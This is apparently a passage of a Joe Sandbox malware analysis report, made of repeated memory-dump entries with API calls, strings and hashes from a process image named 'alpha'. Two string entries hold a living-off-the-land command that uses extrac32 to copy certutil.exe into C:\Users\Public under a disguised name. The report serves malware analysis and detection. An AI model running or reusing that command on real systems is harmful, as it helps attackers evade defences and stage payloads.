                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                    • String ID: CSVFS$NTFS$REFS
                                                                    • API String ID: 3510147486-2605508654
                                                                    • Opcode ID: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                    • Instruction ID: 54f13eb94f7a63c049f7abc5d7fb69ca10bf74aca3624eac17364f0704495db2
                                                                    • Opcode Fuzzy Hash: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                    • Instruction Fuzzy Hash: 9A614932608FC2CAEB659F21D8443E9A7A5FB45B98F855079DA0D4B758DF3CD209C720
                                                                    APIs
                                                                    • longjmp.MSVCRT(?,00000000,00000000,00007FF719667279,?,?,?,?,?,00007FF71966BFA9), ref: 00007FF719684485
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: longjmp
                                                                    • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                    • API String ID: 1832741078-366822981
                                                                    • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                    • Instruction ID: 0b87ecf68bd7fc3345ff7f3a145dcf4eac89c3c3b5319a2e00fa2a497e222504
                                                                    • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                    • Instruction Fuzzy Hash: B0C16960E0CF42C5E624AE1651416B8E7B3AB46FACFD0003ADD0D53691CF2DA94F9371
                                                                    APIs
                                                                      • Part of subcall function 00007FF71966CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDA6
                                                                      • Part of subcall function 00007FF71966CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDBD
                                                                    • memset.MSVCRT ref: 00007FF71966BA2B
                                                                    • wcschr.MSVCRT ref: 00007FF71966BA8A
                                                                    • wcschr.MSVCRT ref: 00007FF71966BAAA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heapwcschr$AllocProcessmemset
                                                                    • String ID: -$:.\$=,;$=,;+/[] "
                                                                    • API String ID: 2872855111-969133440
                                                                    • Opcode ID: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                    • Instruction ID: 64acefe5d43db12f746e834b1383638b799c46f0da5bbedb8a07dac254a33588
                                                                    • Opcode Fuzzy Hash: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                    • Instruction Fuzzy Hash: D0B19321A0DE42C5EA64AF25904427DA7B2FF84BA8FC55235CA5E47394DF3CE44B8330
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                    • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                    • API String ID: 1606811317-2340392073
                                                                    • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                    • Instruction ID: 8a03efef916809c7116e58bf1f40e25c0328e1b5e4dc04bdd0333c211690dff6
                                                                    • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                    • Instruction Fuzzy Hash: 2AD16E25A08E4285EA14AF25A804179A7B2FF45BB8FD44131DA5D077E5DF3CE40BC730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ErrorLast$InformationVolume
                                                                    • String ID: %04X-%04X$~
                                                                    • API String ID: 2748242238-2468825380
                                                                    • Opcode ID: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                    • Instruction ID: cd63d921565fbcd5883d5c79813dda8ad93cd656a4bc8d35218ac82a54a33ad6
                                                                    • Opcode Fuzzy Hash: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                    • Instruction Fuzzy Hash: DAA18332708FC1CAEB259F2199502E9B7B2FB85798F808175DA4D4B748DF3CD64A8720
                                                                    APIs
                                                                    • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF719676570,?,?,?,?,?,?,00000000,00007FF719676488), ref: 00007FF719676677
                                                                    • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF719676570,?,?,?,?,?,?,00000000,00007FF719676488), ref: 00007FF71967668F
                                                                    • _errno.MSVCRT ref: 00007FF7196766A3
                                                                    • wcstol.MSVCRT ref: 00007FF7196766C4
                                                                    • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF719676570,?,?,?,?,?,?,00000000,00007FF719676488), ref: 00007FF7196766E4
                                                                    • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF719676570,?,?,?,?,?,?,00000000,00007FF719676488), ref: 00007FF7196766FE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                    • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                    • API String ID: 2348642995-441775793
                                                                    • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                    • Instruction ID: 3c341f2c9a880dd67fa4402b775affe1361370edfefb5b28f2e9fe74afe5512f
                                                                    • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                    • Instruction Fuzzy Hash: 87717F62908E46D5E7686F15D410179F7B2EB85BA8FD4D031DA4E06294EF3CE88AC732
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                    • String ID: FAT$~
                                                                    • API String ID: 2238823677-1832570214
                                                                    • Opcode ID: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                    • Instruction ID: 25c2aa9343385c792576b013f5b538fd350bbc18b0bbf4af78130fefc24b771a
                                                                    • Opcode Fuzzy Hash: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                    • Instruction Fuzzy Hash: BD717D32608FC18AEB25DF2198506E9B7B2FB45799F809035DA4D4BB58DF3CD24AC720
                                                                    APIs
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF71966FE2A), ref: 00007FF71966D884
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF71966FE2A), ref: 00007FF71966D89D
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF71966FE2A), ref: 00007FF71966D94D
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF71966FE2A), ref: 00007FF71966D964
                                                                    • _wcsnicmp.MSVCRT ref: 00007FF71966DB89
                                                                    • wcstol.MSVCRT ref: 00007FF71966DBDF
                                                                    • wcstol.MSVCRT ref: 00007FF71966DC63
                                                                    • memmove.MSVCRT ref: 00007FF71966DD33
                                                                    • memmove.MSVCRT ref: 00007FF71966DE9A
                                                                    • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF71966FE2A), ref: 00007FF71966DF1F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                    • String ID:
                                                                    • API String ID: 1051989028-0
                                                                    • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                    • Instruction ID: 27810165ee047ce2341ce29fc589785f5860aa0481a10dbeadc8c96a9f1cd874
                                                                    • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                    • Instruction Fuzzy Hash: 48029572A08F4581EA24AF15E850279F6B6FB94BE8F954131DA8D07794DF3CE48AC730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$_wcsicmp$AllocProcess
                                                                    • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                    • API String ID: 3223794493-3086019870
                                                                    • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                    • Instruction ID: f7ad0245ab337b50f9635bed27ecfbbbbf0c6fd9fcd9007821e411b2800c6a02
                                                                    • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                    • Instruction Fuzzy Hash: 0D518165A08F4289EA14AF25A41017DBBB2FF49B78F945175CA1E073A0EF3CE44AC731
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                    • API String ID: 0-3124875276
                                                                    • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                    • Instruction ID: 58265d2d5453d6207cb396cb99cd55d64316ac7cb1441f4b0bd097fd43224a8a
                                                                    • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                    • Instruction Fuzzy Hash: 1E515B60A0CE5386FB18BF21A4142B9A6B3AF55B6DFC05035D60E462A4DF3CE44F8770
                                                                    APIs
                                                                      • Part of subcall function 00007FF7196758E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF71968C6DB), ref: 00007FF7196758EF
                                                                      • Part of subcall function 00007FF71967081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF71967084E
                                                                    • towupper.MSVCRT ref: 00007FF71968C1C9
                                                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF71968C31C
                                                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF71968C5CB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                    • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                                                    • API String ID: 2242554020-619615743
                                                                    • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                    • Instruction ID: ce32b13dc84f541ec5a0b81fd287be913e5cb816acb2cf4f9e409e39a33fb4e4
                                                                    • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                    • Instruction Fuzzy Hash: 49128D61E18F42C1EA24AF14A45157AE2B2EB44BB8FD44235DA5E037E8DF3CE54B9730
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00007FF719677013
                                                                    • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF719677123
                                                                      • Part of subcall function 00007FF719671EA0: wcschr.MSVCRT(?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF719690D54), ref: 00007FF719671EB3
                                                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF71967706E
                                                                    • wcsncmp.MSVCRT ref: 00007FF7196770A5
                                                                    • wcsstr.MSVCRT ref: 00007FF71967F9DB
                                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF71967FA00
                                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF71967FA5F
                                                                      • Part of subcall function 00007FF71967823C: FindFirstFileExW.KERNELBASE ref: 00007FF719678280
                                                                      • Part of subcall function 00007FF71967823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF71967829D
                                                                      • Part of subcall function 00007FF719673A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF71968EAC5,?,?,?,00007FF71968E925,?,?,?,?,00007FF71966B9B1), ref: 00007FF719673A56
                                                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF71967FA3D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                    • String ID: \\.\
                                                                    • API String ID: 799470305-2900601889
                                                                    • Opcode ID: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                    • Instruction ID: 6ac9b20082cd9fdcf8f656a725920d94e0af444a4b5bc7c51e94292745faafa5
                                                                    • Opcode Fuzzy Hash: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                    • Instruction Fuzzy Hash: 5D51CB32A08E82C5EB64AF21D8006B9B7B2FF85B68F995535DA4D07794DF3CD54A8330
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                    • String ID:
                                                                    • API String ID: 1944892715-0
                                                                    • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                    • Instruction ID: 72725272ff0283a14a0a3b58717237d43edbdc5b75ee7bd253691da88decdec6
                                                                    • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                    • Instruction Fuzzy Hash: 7CB18071A09F428AEA64BF21A450179E6B2FF55BACFC48135CA4E47395DF3CE44A8331
                                                                    APIs
                                                                      • Part of subcall function 00007FF719673578: _get_osfhandle.MSVCRT ref: 00007FF719673584
                                                                      • Part of subcall function 00007FF719673578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF71967359C
                                                                      • Part of subcall function 00007FF719673578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735C3
                                                                      • Part of subcall function 00007FF719673578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735D9
                                                                      • Part of subcall function 00007FF719673578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735ED
                                                                      • Part of subcall function 00007FF719673578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF719673602
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF7196654DE
                                                                    • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF719661F7D), ref: 00007FF71966552B
                                                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF719661F7D), ref: 00007FF71966554F
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF71968345F
                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF719661F7D), ref: 00007FF71968347E
                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF719661F7D), ref: 00007FF7196834C3
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF7196834DB
                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF719661F7D), ref: 00007FF7196834FA
                                                                      • Part of subcall function 00007FF7196736EC: _get_osfhandle.MSVCRT ref: 00007FF719673715
                                                                      • Part of subcall function 00007FF7196736EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF719673770
                                                                      • Part of subcall function 00007FF7196736EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF719673791
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
